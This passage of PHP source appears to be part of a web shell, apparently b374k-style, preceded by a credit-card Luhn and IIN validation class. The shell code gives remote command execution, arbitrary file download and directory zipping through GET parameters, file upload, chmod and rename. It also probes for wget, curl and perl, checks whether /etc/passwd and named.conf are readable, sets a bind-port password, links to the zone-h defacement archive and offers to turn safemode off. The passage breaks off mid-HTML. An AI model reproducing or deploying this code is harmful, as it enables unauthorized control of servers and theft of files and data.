  978. private function CleanCardNumber($strCardNumber=null) {
  979. return preg_replace('/[^0-9]/','',$strCardNumber);
  980. }
  981. private function GetCardSubstring($strCardNumber=null) {
  982. if(strstr($strCardNumber, '*')&&(substr($strCardNumber)<10))
  983. return $strCardNumber;
  984. $strCardNumber=$this->CleanCardNumber($strCardNumber);
  985. return $strCardNumber?'***' . substr($strCardNumber, (strlen($strCardNumber)-4), 4):'';
  986. }
  987. private function CheckMII($strCardNumber=null) {
  988. $strCardNumber=$this->CleanCardNumber($strCardNumber);
  989. if(!$strCardNumber)
  990. return false;
  991. $intFirstDigit=(int) substr($strCardNumber, 0, 1);
  992. if(!in_array($intFirstDigit,$this->arrAcceptedMII))
  993. return false;
  994. return true;
  995. }
  996. private function CheckLuhn($strCardNumber=null) {
  997. $strCardNumber=(string) $this->CleanCardNumber($strCardNumber);
  998. $strCheckDigit=substr($strCardNumber, (strlen($strCardNumber)-1), 1);
  999. $strCardNumberReverse=strrev($strCardNumber);
  1000. $intTotal=0;
  1001. for($i=1; $i<=strlen($strCardNumberReverse); $i++) {
  1002. $intVal=(int) ($i%2)?$strCardNumberReverse[$i-1]:($strCardNumberReverse[$i-1]*2);
  1003. if($intVal>9) {
  1004. $strVal=(string) $intVal;
  1005. $intVal=(int) ($strVal[0]+$strVal[1]);
  1006. }
  1007. $intTotal+=$intVal;
  1008. }
  1009. return (($intTotal%10)==0)?true:false;
  1010. }
  1011. private function CheckIIN($strCardNumber=null) {
  1012. $strCardNumber=$this->CleanCardNumber($strCardNumber);
  1013. if(!$strCardNumber)
  1014. return false;
  1015. $arrCardTypePossibilities=array();
  1016. foreach($this->arrCardTypes as $strShortName=>$arrCardType) {
  1017. if($arrCardType['active']===true) {
  1018. $strLen=strlen($strCardNumber);
  1019. if($strLen==$arrCardType['length']) {
  1020. $arrRangeSets=explode(',',$arrCardType['iinrange']);
  1021. foreach($arrRangeSets as $strRangeSetItem) {
  1022. $arrStrRanges=explode('-',$strRangeSetItem);
  1023. if(count($arrStrRanges)>1) {
  1024. for($i=$arrStrRanges[0]; $i<=$arrStrRanges[1]; $i++) {
  1025. if((strpos((string) $strCardNumber, (string) $i)===0)&&!in_array($strShortName,$arrCardTypePossibilities))
  1026. $arrCardTypePossibilities[]=$strShortName;
  1027. }
  1028. }else{
  1029. if((strpos((string) $strCardNumber, (string) trim($arrStrRanges[0]))===0)&&!in_array($strShortName,$arrCardTypePossibilities))
  1030. $arrCardTypePossibilities[]=$strShortName;
  1031. }
  1032. }
  1033. }
  1034. }
  1035. }
  1036. $this->arrCardInfo['type']=implode('|',$arrCardTypePossibilities);
  1037. return count($arrCardTypePossibilities)?true:false;
  1038. }
  1039. public function GetCardInfo() {
  1040. return $this->arrCardInfo;
  1041. }
  1042. public function GetCardName($strCardShortName=null) {
  1043. return isset($this->arrCardTypes[$strCardShortName]['name'])?$this->arrCardTypes[$strCardShortName]['name']:'';
  1044. }
  1045. }
  1046.  
  1047.  
  1048. function showstat($a) {
  1049. if($a=='on') {
  1050. return '<font style="color:#0ff">ON</font>';
  1051. }else{
  1052. return '<font style="color:#f00;">OFF</font>';
  1053. }
  1054. }
  1055. function testperl() {
  1056. if(exe('perl -h')) {
  1057. return showstat('on');
  1058. }else{
  1059. return showstat('off');
  1060. }
  1061. }
  1062. function testfetch() {
  1063. if(exe('fetch --help')) {
  1064. return showstat('on');
  1065. }else{
  1066. return showstat('off');
  1067. }
  1068. }
  1069. function testwget() {
  1070. if(exe('wget --help')) {
  1071. return showstat('on');
  1072. }else{
  1073. return showstat('off');
  1074. }
  1075. }
  1076. function testoracle() {
  1077. if(function_exists('ocilogon')) {
  1078. return showstat('on');
  1079. }else{
  1080. return showstat('off');
  1081. }
  1082. }
  1083. function testpostgresql() {
  1084. if(function_exists('pg_connect')) {
  1085. return showstat('on');
  1086. }else{
  1087. return showstat('off');
  1088. }
  1089. }
  1090. function testmssql() {
  1091. if(function_exists('mssql_connect')) {
  1092. return showstat('on');
  1093. }else{
  1094. return showstat('off');
  1095. }
  1096. }
  1097. function testcurl() {
  1098. if(function_exists('curl_version')) {
  1099. return showstat('on');
  1100. }else{
  1101. return showstat('off');
  1102. }
  1103. }
  1104. function testmysql() {
  1105. if(function_exists('mysql_connect')) {
  1106. return showstat('on');
  1107. }else{
  1108. return showstat('off');
  1109. }
  1110. }
  1111. function testmysqli(){
  1112. if(function_exists('mysqli_connect')) {
  1113. return showstat('on');
  1114. }else{
  1115. return showstat('off');
  1116. }
  1117. }
  1118.  
  1119.  
  1120. function dlzip($a,$b){
  1121. if(!extension_loaded('zip')||!file_exists($a)){
  1122. return false;
  1123. }
  1124. $c=new ZipArchive();
  1125. if(!$c->open($b,ZIPARCHIVE::CREATE)){
  1126. return false;
  1127. }
  1128. $a=str_replace('\\','/',realpath($a));
  1129. if(is_dir($a)===true){
  1130. $d=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($a),RecursiveIteratorIterator::SELF_FIRST);
  1131. foreach($d as $e){
  1132. $e=str_replace('\\','/',$e);
  1133. if(in_array(substr($e, strrpos($e,'/')+1),array('.','..')))continue;
  1134. $e=realpath($e);
  1135. if(is_dir($e)===true){
  1136. $c->addEmptyDir(str_replace($a.'/','',$e.'/'));
  1137. }elseif(is_file($e)===true){
  1138. $c->addFromString(str_replace($a.'/','',$e),file_get_contents($e));
  1139. }
  1140. }
  1141. }elseif(is_file($a)===true){
  1142. $c->addFromString(basename($a),file_get_contents($a));
  1143. }
  1144. return $c->close();
  1145. }
  1146.  
  1147. if(isset($_GET['dl'])&&($_GET['dl']!="")){
  1148. $a=$_GET['dl'];
  1149. $b=@file_get_contents($a);
  1150. if($b){
  1151. header("Content-type: application/octet-stream");
  1152. header("Content-length: " .strlen($b));
  1153. header("Content-Length: " .filesize($a));
  1154. header("Content-disposition: attachment; filename=\"".basename($a)."\";");
  1155. echo $b;
  1156. }
  1157. exit();
  1158. }elseif(isset($_GET['dlgzip'])&&($_GET['dlgzip']!="")) {
  1159. $a=$_GET['dlgzip'];
  1160. $b=gzencode(@file_get_contents($a));
  1161. header("Content-Type:application/x-gzip\n");
  1162. header("Content-length: ".strlen($b));
  1163. header("Content-Length: ".filesize($a));
  1164. header("Content-disposition: attachment; filename=\"".basename($a).".gz\";");
  1165. echo $b;
  1166. exit();
  1167. }elseif(isset($_GET['dlzip'])&&($_GET['dlzip']!="")){
  1168. $old=urldecode($_GET['dlzip']);
  1169. $zippath=pathinfo($old);
  1170. $dirname=$zippath['dirname'].DIRECTORY_SEPARATOR;
  1171. $zipname=preg_replace('/[^[:^punct:]\s-]/','_',$zippath['filename']);
  1172. $dlzip=(!empty($zipname)?$zipname:date('Y_m_d_h_i_s')).'.zip';
  1173. $dirname=(is_writable($dirname)?$dirname:$pwd);
  1174. dlzip($old,$dirname.$dlzip);
  1175. if(file_exists($dirname.$dlzip)){
  1176. header('Pragma: public');
  1177. header('Expires: 0');
  1178. header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  1179. header('Last-Modified: '.gmdate('D, d M Y H:i:s',filemtime($dirname.$dlzip)).' GMT');
  1180. header('Content-Type: application/force-download');
  1181. header('Content-Disposition: attachment; filename="'.$dlzip.'"');
  1182. header('Content-Transfer-Encoding: binary');
  1183. header('Content-Length: '.filesize($dirname.$dlzip));
  1184. header('Connection: close');
  1185. readfile($dirname.$dlzip);
  1186. }
  1187. exit();
  1188. }
  1189. if(isset($_GET['img'])){
  1190. ob_clean();
  1191. $a=magicboom($_GET['dm']);
  1192. $b=$_GET['img'];
  1193. $c=getimagesize($a.$b);
  1194. $d=explode($b,'.');
  1195. $d=$d[count($d)-1];
  1196. header("Content-type: ".$c['mime']);
  1197. header("Cache-control: public");
  1198. header("Expires: ".date('r',mktime(0,0,0,1,1,2030)));
  1199. header("Cache-control: max-age=".(60*60*24*7));
  1200. readfile($a.$b);
  1201. exit();
  1202. }
  1203. $software=getenv('SERVER_SOFTWARE');
  1204. $smfde=@ini_get('safe_mode');
  1205. if($smfde or strtolower($smfde)=='on'){
  1206. $safemode=TRUE;
  1207. }else{
  1208. $safemode=FALSE;
  1209. }
  1210. $system=php_uname();
  1211. if(strtolower(substr($system,0,3))=="win"){
  1212. $win=TRUE;
  1213. }else{
  1214. $win=FALSE;
  1215. }
  1216. if(isset($_GET['dm'])){
  1217. if(is_dir($_GET['view'])){
  1218. chdir($_GET['view']);
  1219. }else{
  1220. chdir($_GET['dm']);
  1221. }
  1222. }
  1223. if(!$win){
  1224. if(!$user=rapih(exx('whoami')))
  1225. $user='';
  1226. if(!$id=rapih(exx('id')))
  1227. $id='';
  1228. $prompt=$user.' $] ';
  1229. $pwd=getcwd().DIRECTORY_SEPARATOR;
  1230. }else{
  1231. $user=get_current_user();
  1232. $id=$user;
  1233. $prompt=$user.' &gt;';
  1234. $pwd=realpath('.').'\\';
  1235. $v=explode('\\',$d);
  1236. $v=$v[0];
  1237. foreach(range('A','Z') as $letter) {
  1238. $bool=is_dir($letter.':\\');
  1239. if($bool) {
  1240. $letters.='<div class="dminfox">Directory: <a href="?dm='.$letter.':\"><span class="infodmx">[ ';
  1241. if($letter.":"!=$v){
  1242. $letters.=$letter;
  1243. }else{
  1244. $letters.=$letter;
  1245. }
  1246. $letters.=' ]</span></a></div>';
  1247. }
  1248. }
  1249. }
  1250.  
  1251. if(isset($_POST['rename'])){
  1252. $old=$_POST['oldname'];
  1253. $new=$_POST['newname'];
  1254. @rename($pwd.$old,$pwd.$new);
  1255. $file=$pwd.$new;
  1256. }
  1257. if(isset($_POST['re_name'])){
  1258. $old=$_POST['old_name'];
  1259. $new=$_POST['new_name'];
  1260. if(rename($pwd.$old,$pwd.$new)){
  1261. $file=$pwd.$new;
  1262. header("Location: ".d_h.$_SERVER['SCRIPT_NAME']."?dm=$pwd&view=$file");
  1263. }
  1264. }
  1265.  
  1266. if(isset($_POST['chmod'])){
  1267. $name=$_POST['name'];
  1268. $value=$_POST['newvalue'];
  1269. if(strlen($value)==3){
  1270. $value=0 .''.$value;
  1271. }
  1272. @chmod($pwd.$name,octdec($value));
  1273. $file=$pwd.$name;
  1274. }
  1275. if(isset($_POST['chmod_folder'])){
  1276. $name=$_POST['name'];
  1277. $value=$_POST['newvalue'];
  1278. if(strlen($value)==3){
  1279. $value=0 .''.$value;
  1280. }
  1281. @chmod($pwd.$name,octdec($value));
  1282. $file=$pwd.$name;
  1283. }
  1284.  
  1285. if($_POST['_upl']=='go'){
  1286. $fname=$_FILES['file']['name'];
  1287. $ldir=magicboom($_POST['path']);
  1288. if(copy($_FILES['file']['tmp_name'],$ldir.$fname)){
  1289. echo"<script>alert('".$ldir.$fname."')</script>";
  1290. }else{
  1291. echo"<script>alert('Upload ".$fname." Error')</script>";
  1292. }
  1293. }
  1294.  
  1295. if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')){$posix=true;}else{$posix=false;}
  1296. $bytes=disk_free_space('.');
  1297. $si_prefix=array('B','KB','MB','GB','TB','EB','ZB','YB');
  1298. //$base=1024;
  1299. $class=min((int)log($bytes,1024),count($si_prefix)-1);
  1300. $totalspace_bytes=disk_total_space(".");
  1301. $totalspace_si_prefixs=array('B','KB','MB','GB','TB','EB','ZB','YB');
  1302. //$totalspace_bases=1024;
  1303. $totalspace_class=min((int)log($totalspace_bytes,1024),count($totalspace_si_prefixs)-1);
  1304. $totalspace_show=sprintf('%1.2f',$totalspace_bytes/pow(1024,$totalspace_class)).' '.$totalspace_si_prefixs[$totalspace_class];
  1305. $freespace_show=sprintf('%1.2f',$bytes/pow(1024,$class)).' '.$si_prefix[$class];
  1306. //$server_ip=gethostbyname($_SERVER['HTTP_HOST']);
  1307. //$server_ip=$_SERVER['SERVER_ADDR'];
  1308. $server_ip=gethostbyname(gethostname());
  1309. $host_name=php_uname()?php_uname():gethostbyaddr($server_ip);
  1310. $my_ip=$_SERVER['REMOTE_ADDR'];
  1311. $server_admin=$_SERVER['SERVER_ADMIN'];
  1312. $gat=$_SERVER['GATEWAY_INTERFACE'];
  1313. $pro=$_SERVER['SERVER_PROTOCOL'];
  1314. $readdr=$_SERVER['REMOTE_ADDR'];
  1315. $uagent=$_SERVER['HTTP_USER_AGENT'];
  1316. $xforwarded=(isset($_SERVER['HTTP_X_FORWARDED_FOR'])?$_SERVER['HTTP_X_FORWARDED_FOR']:$_SERVER['REMOTE_ADDR']);
  1317. $signature=$_SERVER['SERVER_SIGNATURE'];
  1318. $serport=$_SERVER['SERVER_PORT'];
  1319. $remport=$_SERVER['REMOTE_PORT'];
  1320. $bindport="13123";
  1321. $bindport_pass="b374k";
  1322. $is_writable=is_writable($pwd)?"<span style='color:#0ff'/>Writeable</span>":"<span style='color:#f00'/>Not writable</span>";
  1323. if(file_exists('/etc/passwd')){
  1324. $etc_passwd=is_readable("/etc/passwd")?"<span style='color:#0ff'/>ON</span>":"<span style='color:#f00'/>DISABLE</span>";
  1325. }else{
  1326. $etc_passwd="<span style='color:#ff0'/>File does not exist</span>";
  1327. }
  1328. if(file_exists('/etc/valiases/')){
  1329. $etc_valiases=is_readable("/etc/valiases/")?"<span style='color:#0ff'/>ON</span>":"<span style='color:#f00'/>DISABLE</span>";
  1330. }else{
  1331. $etc_valiases="<span style='color:#ff0'/>File does not exist</span>";
  1332. }
  1333. if(file_exists('/var/named')){
  1334. $var_named=is_readable("/var/named")?"<span style='color:#0ff'/>ON</span>":"<span style='color:#f00'/>DISABLE</span>";
  1335. }else{
  1336. $var_named="<span style='color:#ff0'/>File does not exist</span>";
  1337. }
  1338. if(file_exists('/etc/named.conf')){
  1339. $etc_named=is_readable("/etc/named.conf")?"<span style='color:#0ff'/>ON</span>":"<span style='color:#f00'/>DISABLE</span>";
  1340. }else{
  1341. $etc_named="<span style='color:#ff0'/>File does not exist</span>";
  1342. }
  1343. $pwds=explode(DIRECTORY_SEPARATOR,$pwd);
  1344. $pwdurl='';
  1345. for($i=0;$i<sizeof($pwds)-1;$i++){$pathz='';for($j=0;$j<=$i;$j++){$pathz.=$pwds[$j].DIRECTORY_SEPARATOR;}$pwdurl.="<a href=\"?dm=".$pathz."\">".$pwds[$i].DIRECTORY_SEPARATOR."</a>\t";}
  1346.  
  1347. $buff.="<span class='dminfox'>Software</span>: <span style='color:#0ff;'/>$software</span><br />";
  1348. $buff.="<span class='dminfox'>System</span>: <span style='color:#00ffff;'/>$host_name</span><br />";
  1349. $buff.="<span class='dminfox'>Webmaster</span>: <span style='color:#0ff;'>$server_admin</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Date: <span style='color:#0ff;'/>".date("d M Y H:i:s",time())."</span><br />";
  1350. if($id!=""){$buff.="<span class='dminfox'>User</span>: <span style='color:#0ff;'>$id</span><br />";}
  1351. $buff.="<span class='dminfox'>Server IP</span>: <span style='color:#0ff;'/>$server_ip</span> <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span> <a href='http://zone-h.com/archive/ip=$server_ip?zh=1' target='_blank'><span style=\"color:#f00\">[</span>ZONE-H<span style=\"color:#f00\">]</span></a> <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span> <a href='https://www.whois.com/whois/$server_ip' target='_blank'><span style=\"color:#f00\">[</span>WHOIS<span style=\"color:#f00\">]</span></a> <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span> <a href='http://viewdns.info/reverseip/?host=$server_ip&amp;t=1' target='_blank'><span style=\"color:#f00\">[</span>VIEW-DNS<span style=\"color:#f00\">]</span></a><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Server Port</span>: <span style='color:#0ff;'/>$serport</span><br />";
  1352. $buff.="<span class='dminfox'>Your IP</span>: <span style='color:#0ff;'/>$my_ip</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Real IP</span>: <span style='color:#0ff;'/>$xforwarded</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Remote Port</span>: <span style='color:#0ff;'/>$remport</span><br />";
  1353. $buff.="<span class='dminfox'>Total HDD</span>: <span style='color:#0ff;'>$totalspace_show</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Free HDD</span>: <span style='color:#0ff;'>$freespace_show</span> <br />";
  1354. $buff.="<span class='dminfox'>PHP ver</span>: <span style='color:#0ff;'>".phpversion()."</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Gateway</span>: <span style='color:#0ff;'>$gat</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Protocol</span>: <span style='color:#0ff;'>$pro</span><br />";
  1355. if($safemode){
  1356. $buff.="<span class='dminfox'>Safemode</span>: <span style='color:#f00'>ON</span> [ <a href='?dm=$pwd&amp;x=safemodeoff'>TURN OFF</a> ]<br />";
  1357. }else{
  1358. $buff.="<span class='dminfox'>Safemode</span>: <span style='color:#0ff;'>OFF</span><span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Magic Quotes</span>: $quot<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>/etc/passwd</span>: $etc_passwd</span><br />";
  1359. $buff.="<span class='dminfox'>etc/valiases</span>: $etc_valiases<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>/var/named</span>: $var_named<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>/etc/named.conf</span>: $etc_named</span><br />";
  1360. }
  1361. $buff.="<span class='dminfox'>MySQLI</span>: ".testmysqli()."<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>MySQL</span>: ".testmysql()."<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>MSSQL</span>: ".testmssql()." <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Oracle</span>: ".testoracle()." <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>PostgreSQL</span>: ".testpostgresql()."<br />";
  1362. $buff.= "<span class='dminfox'>Curl</span>: ".testcurl()."<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>WGet</span>: ".testwget()." <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Fetch</span>: ".testfetch()."<span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Perl</span>: ".testperl()." <span class='infodmx'>&#x20;&vert;&vert;&#x20;</span><span class='dminfox'>Dir</span>: $is_writable<br />";
  1363. $buff.="<span class='dminfox'>Disabled Functions</span>: ".showdisablefunctions()."<br />";
  1364. $buff.=$letters."<span class='dminfox'>Directory: $pwdurl</span><br /><br />";
  1365.  
  1366. function showdir($t,$prompt){
  1367. $a=array();
  1368. $b=array();
  1369. $c='data:image/png;base64,R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWSkrqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/jVwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=';
  1370. $d='data:image/png;base64,R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqtWg0JADs=';
  1371. $e='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=';
  1372. $f='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAAadEVYdFNvZnR3YXJlAFBhaW50Lk5FVCB2My41LjEwMPRyoQAAAXVJREFUOE+NkjtPwlAYhv0DLEZJSDQawQCTcYD/YWIkzqx0cHT1D7C4nMRFSdOWi4uzm9FFXcRBI3KxQGlLoYCAILyekhiRw6UneZKmeb8n79eepaW/43e5XFGfz0csvF4v8Xi2yfrGJllecRIa2xnLMo+OcDis6kYNulEfUdEMZD/KuH1IQ7y6RiQS0eZJAolkig6U/pHJy0i/vOPm/gnlikYl3ExJMJm6hFxWGQpFhUqyKJQqyNFGHMfptMnu5A5UkBrVZqkiLyt4zcrI5It4y8nY2w9ZkrVxSdBaoVozZ6LqtVGDu8dnHB2fgA4HGYHZaGE2TRj1BoqKhlNyxgriiSRan+2FmM0WYrzACiQq6HS7C2l3uhDjiSkC+vKr17OFNE0gSnH0+9+2sLLMRxRECYPBwBaCOEXACyKGw6EteEFiGgTOYzzsnguapSsExu+B4yB0qJYUlf5rcy5WxsrSYcfkdfavOp3RLbebzMPK0EH/7/APv59j7X+gJNIAAAAASUVORK5CYII=';
  1373. if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid')){$g=true;}else{$g=false;}
  1374. if(function_exists('get_current_user')){
  1375. $h=get_current_user()."<span class='gaya'>:</span>".get_current_user();
  1376. }else{
  1377. $h="Eddie:Kidiw";
  1378. }
  1379. if($j=opendir($t)){
  1380. while($k=readdir($j)){
  1381. if(is_dir($k)){
  1382. $b[]=$k;
  1383. }elseif(is_file($k)){
  1384. $a[]=$k;
  1385. }
  1386. }
  1387. closedir($j);
  1388. }
  1389. sort($a);
  1390. sort($b);
  1391. $l=explode(DIRECTORY_SEPARATOR,$t);
  1392. $m=sizeof($l);
  1393. $n="";
  1394. $s='<table align="center">
  1395. <tr>
  1396. <td><span style="font-family:monsters_attack">CMD</span></td>
  1397. <td><form action="?dm='.$t.'&amp;x=shell" method="post">
  1398. <input id="cmd" class="inputz" type="text" name="cmd" style="width:300px;" value="" />
  1399. <span class="awesomeget">
  1400. <input class="inputzbut inputsubmit" type="submit" value="go" name="submitcmd" style="width:50px;" /></span></form></td></tr>
  1401. <tr><td><span style="font-family:monsters_attack">DIR</span></td>
  1402. <td><form action="" method="get"><input type="hidden" name="dm" value="'.$t.'" />
  1403. <input id="goto" class="inputz" type="text" name="view" style="width:300px;" value="'.$t.'" />
  1404. <span class="awesomeget">
  1405. <input class="inputzbut inputsubmit" type="submit" value="go" name="submitcmd" style="width:50px;" /></span></form>
  1406. </td></tr></table>
  1407. <table class="explore"><tr>
  1408. <th style="width:200px;">_NAME_</th>
  1409. <th style="width:70px;">_DIR&nbsp;&amp;&nbsp;SIZE_</th>
  1410. <th style="width:70px;">_CHMOD_</th>
  1411. <th style="width:150px;">_OWNER&nbsp;&#x3A;&nbsp;GROUP_</th>
  1412. <th style="width:140px;">_LAST&nbsp;ACCESS_</th>
  1413. <th style="width:150px;">_ACTION_</th></tr>';
  1414. if($m>2)
  1415. for($i=0;$i<$m-2;$i++){$n.=$l[$i].DIRECTORY_SEPARATOR;}else{$n=$t;}
  1416. foreach($b as $r){
  1417. if($r=='.'){
  1418. if(!$win&&$g){
  1419. $q=owneruser($r);
  1420. }else{$q=$h;}
  1421. $s.='<tr>
  1422. <td><a href="?dm='.$t.'" title="Home"><i class="fa fa-home fa-lg"></i><!--<img src="'.$c.'">--></a>&nbsp;'.str_replace('.','',$r).'</td>
  1423. <td align=center><i class="fa fa-folder fa-lg"></td>
  1424. <td align=center>'.substr(sprintf('%o',fileperms($t)),-4).'</td>
  1425. <td align=center>'.$q.'</td>
  1426. <td align=center>'.date('d-M-Y H:i',fileatime($t)).'</td>
  1427. <td align=center>
  1428. <div id="'.clearspace($r).'_link">
  1429. <a href="?dm='.$t.'&amp;ed='.$t.'new.php" title="Tambah File"><i class="fa fa-file-text"></i></a> &nbsp;
  1430. &nbsp;<span class="infodmx">||</span>&nbsp;
  1431. &nbsp; <a href="javascript:tukar(\''.clearspace($r).'_link\',\''.clearspace($r).'_newdirs\')" title="Tambah Folder"><i class="fa fa-folder-open"></i></a> &nbsp;
  1432. &nbsp;<span class="infodmx">||</span>&nbsp;
  1433. &nbsp; <a href="javascript:tukar(\''.clearspace($r).'_link\',\''.clearspace($r).'_uploads\')" title="Upload"><i class="fa fa-cloud-upload"></i></a>
  1434. </div>
  1435. <div id="'.clearspace($r).'_newdirs" class="sembunyi" style="margin:0;padding:0;">
  1436. <form action="" method="get" style="display:inline-block">
  1437. <input type="hidden" name="dm" value="'.$t.'" />
  1438. <input class="inputz" style="width:140px;" type="text" name="mkdir" value="'.date('d-m-Y').'" />
  1439. <button class="inputzbut" type="submit" name="rename"><i class="fa fa-check-circle"></i></button>
  1440. </form>
  1441. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_newdirs\',\''.clearspace($r).'_link\')"><i class="fa fa-times"></i></button>
  1442. </div>
  1443. <div id="'.clearspace($r).'_uploads" class="sembunyi" style="margin:0;padding:0;">
  1444. <form action="" method="post" enctype="multipart/form-data" style="display:inline-block">
  1445. <input type="hidden" name="dm" value="'.$t.'" />
  1446. <input type="file" name="file" size="20"/>
  1447. <input name="path" type="hidden" value="'.$t.'" />
  1448. <span class="awesome"><input type="submit" name="_upl" value="go" class="inputsubmit"/></span>
  1449. <!--<button class="inputzbut" type="submit" name="_upl" value="go"><i class="fa fa-check-circle"></i></button>-->
  1450. </form>
  1451. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_uploads\',\''.clearspace($r).'_link\')"><i class="fa fa-times"></i></button>
  1452. </div>
  1453. </td>
  1454. </tr>';
  1455. }elseif($r=='..'){
  1456. if(!$win&&$g){
  1457. $q=owneruser($r);
  1458. }else{$q=$h;}
  1459. $s.='<tr>
  1460. <td><a href="?dm='.$n.'" title="Kembali">
  1461. <i class="fa fa-reply-all fa-lg"></i><!--<img src="'.$d.'">--></a>&nbsp;'.str_replace('.','',$r).'</td>
  1462. <td align=center><i class="fa fa-folder fa-lg"></td>
  1463. <td align=center>'.substr(sprintf('%o',fileperms($n)),-4).'</td>
  1464. <td align=center>'.$q.'</td>
  1465. <td align=center>'.date('d-M-Y H:i',fileatime($n)).'</td>
  1466. <td align=center>
  1467. <div id="'.clearspace($r).'_link">
  1468. <a href="?dm='.$t.'&amp;ed='.$n.'new.php" title="Tambah File"><i class="fa fa-file-text"></i></a> &nbsp;
  1469. &nbsp;<span class="infodmx">||</span>&nbsp;
  1470. &nbsp; <a href="javascript:tukar(\''.clearspace($r).'_link\',\''.clearspace($r).'_newdir\')" title="Tambah Folder"><i class="fa fa-folder-open"></i></a> &nbsp;
  1471. &nbsp;<span class="infodmx">||</span>&nbsp;
  1472. &nbsp; <a href="javascript:tukar(\''.clearspace($r).'_link\',\''.clearspace($r).'_formup\')" title="Upload"><i class="fa fa-cloud-upload"></i></a>
  1473. </div>
  1474. <div id="'.clearspace($r).'_newdir" class="sembunyi" style="margin:0;padding:0;">
  1475. <form action="" method="get" style="display:inline-block">
  1476. <input type="hidden" name="dm" value="'.$n.'" />
  1477. <input class="inputz" style="width:140px;" type="text" name="mkdir" value="'.date('d-m-Y').'" />
  1478. <button class="inputzbut" type="submit" name="rename"><i class="fa fa-check-circle"></i></button>
  1479. </form>
  1480. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_newdir\',\''.clearspace($r).'_link\')"><i class="fa fa-times"></i></button>
  1481. </div>
  1482. <div id="'.clearspace($r).'_formup" class="sembunyi" style="margin:0;padding:0;">
  1483. <form action="" method="post" enctype="multipart/form-data" style="display:inline-block">
  1484. <input type="hidden" name="dm" value="'.$n.'" />
  1485. <input type="file" name="file" size="20"/>
  1486. <input name="path" type="hidden" value="'.$n.'" />
  1487. <span class="awesome"><input type="submit" name="_upl" value="go" class="inputsubmit"/></span>
  1488. <!--<button class="inputzbut" type="submit" name="_upl" value="go"><i class="fa fa-check-circle"></i></button>-->
  1489. </form>
  1490. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_formup\',\''.clearspace($r).'_link\')"><i class="fa fa-times"></i></button>
  1491. </div>
  1492. </td>
  1493. </tr>';
  1494. }else{
  1495. if(!$win&&$g){
  1496. $q=owneruser($r);
  1497. }else{$q=$h;}
  1498. $s.='<tr>
  1499. <td>
  1500. <a id="'.clearspace($r).'_link" href="?dm='.$t.$r.DIRECTORY_SEPARATOR.'" title="'.$r.'"><i class="fa fa-folder fa-lg"></i><!--<img src="'.$e.'">-->&nbsp;'.$r.'</a>
  1501. <!-- rename -->
  1502. <div id="'.clearspace($r).'_form" class="sembunyi" style="margin:0;padding:0;">
  1503. <form action="?dm='.$t.'" method="post" style="display:inline-block">
  1504. <input type="hidden" name="oldname" value="'.$r.'" style="margin:0;padding:0;" />
  1505. <input class="inputz" style="width:200px;" type="text" name="newname" value="'.$r.'" />
  1506. <button class="inputzbut" type="submit" name="rename"><i class="fa fa-check-circle"></i></button>
  1507. </form>
  1508. <button class="inputzbut" type="submit" onclick="tukar(\''.clearspace($r).'_form\',\''.clearspace($r).'_link\')"><i class="fa fa-times"></i></button>
  1509. </div>
  1510. </td>
  1511. <td align=center><i class="fa fa-folder fa-lg"></td>
